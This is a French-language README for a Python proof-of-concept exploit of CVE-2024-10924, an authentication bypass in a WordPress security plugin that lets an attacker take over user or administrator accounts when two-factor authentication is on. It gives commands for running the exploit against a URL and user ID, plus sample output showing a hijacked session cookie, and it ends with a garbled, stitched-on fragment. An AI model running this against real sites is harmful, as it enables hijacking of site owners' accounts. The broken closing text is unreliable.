
POC pour CVE-2024-10924 écrit en Python
Une faille de gestion d'erreur dans l'API REST du plugin WordPress Really Simple Plugins (versions entre 9.0.0 et 9.1.1.1 incluses) permet à un attaquant, lorsque l'authentification à deux facteurs est activée, de contourner l'authentification et de prendre le contrôle d'un compte utilisateur ou administrateur existant.
Comme je suis un gentil garçon, vous trouverez également la version 9.1.1.1 du plugin. Il suffit de décompresser et de le télécharger dans le dossier wp-content/plugins. N'oubliez pas d'activer le plugin et d'activer la 2FA.
Installez les dépendances requises avec pip :
pip install -r requirements.txt
python exploit.py [-id USER_ID] URL
Avec un ID utilisateur spécifique :
python exploit.py -id 10 http://localhost:8886/
Cela envoie la charge utile d'exploitation avec un ID utilisateur de 10.
Sans spécifier d'ID utilisateur :
python exploit.py http://localhost
Par défaut, l'ID utilisateur est 1.
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
verify=False) uniquement si nécessaire pour les tests.Je ne sais pas, mais je ne suis responsable de rien.